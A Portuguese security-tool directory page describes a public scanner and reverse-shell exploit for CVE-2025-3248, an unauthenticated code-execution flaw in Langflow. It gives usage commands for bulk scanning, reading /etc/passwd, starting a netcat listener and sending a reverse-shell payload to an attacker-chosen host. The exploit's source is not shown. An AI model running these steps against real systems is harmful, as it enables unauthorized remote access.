Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-3248 — Scanner e exploit para CVE-2025-3248, uma RCE não autenticada no Langflow AI. Inclui um verificador de vulnerabilidades e um gerador de payloads de reverse shell para testes de segurança autorizados. | Kitploit
Ferramentas/GitHubGitHub/r0otk3r/cve-2025-3248
Scanners de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoComando e ControleRed TeamingFerramenta de Acesso RemotoDesenvolvimento de Payloads
GitHubr0otk3r/cve-2025-3248

CVE-2025-3248

Scanner e exploit para CVE-2025-3248, uma RCE não autenticada no Langflow AI. Inclui um verificador de vulnerabilidades e um gerador de payloads de reverse shell para testes de segurança autorizados.

13há 1 anoAinda não revisado
Ver Repositório

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-3248: Langflow Execução Remota de Código (RCE) Não Autenticada

Este repositório contém dois scripts Python:

  • LangflowCheck.py: Um scanner que verifica instâncias Langflow AI vulneráveis ao CVE-2025-3248.
  • exploit.py: Um exploit funcional de reverse shell para alvos Langflow vulneráveis.

Resumo

CVE-2025-3248 é uma vulnerabilidade crítica no Langflow AI que permite que atacantes não autenticados executem código Python arbitrário remotamente por meio de um payload malicioso enviado para /api/v1/validate/code.


Arquivos

LangflowCheck.py

  • Verifica se um alvo é vulnerável tentando executar um payload inofensivo que lê /etc/passwd.
  • Pode escanear um único alvo ou uma lista de URLs.
  • Suporta a saída dos alvos vulneráveis para um arquivo.
  • exploit.py

    • Envia um payload de reverse shell para o endpoint vulnerável.
    • Requer o IP do atacante (lhost) e a porta do listener (lport).
    • Registra a atividade em exploit.log.
    • Suporta verificação do listener antes de enviar o payload.

    Uso

    1. Instalar Requisitos

    root@kitploit:~
    pip install -r requirements.txt
    

    2. Executar o Scanner de Vulnerabilidades

    URL Única

    root@kitploit:~
    python3 LangflowCheck.py --url http://target.com --output vulnerable_target.txt
    

    1

    Múltiplos Alvos

    root@kitploit:~
    python3 LangflowCheck.py --file targets.txt --output vulnerable_targets.txt
    

    tt

    3. Explorar um Alvo

    Primeiro, inicie um listener

    root@kitploit:~
    sudo nc -nvlp 4444
    

    l

    Em seguida, execute o exploit:

    root@kitploit:~
    python3 exploit.py --target http://target.com --lhost YOUR_IP --lport 4444
    

    2

    Você deve receber um shell se o alvo for vulnerável. root

    ⚠️ Aviso Legal

    Este exploit é exclusivamente para fins educacionais e testes de segurança autorizados. Não o utilize contra sistemas que você não possui ou para os quais não tenha permissão explícita para testar.


    Canais Oficiais

    • YouTube @rootctf
    • X @r0otk3r
    Baixar ferramenta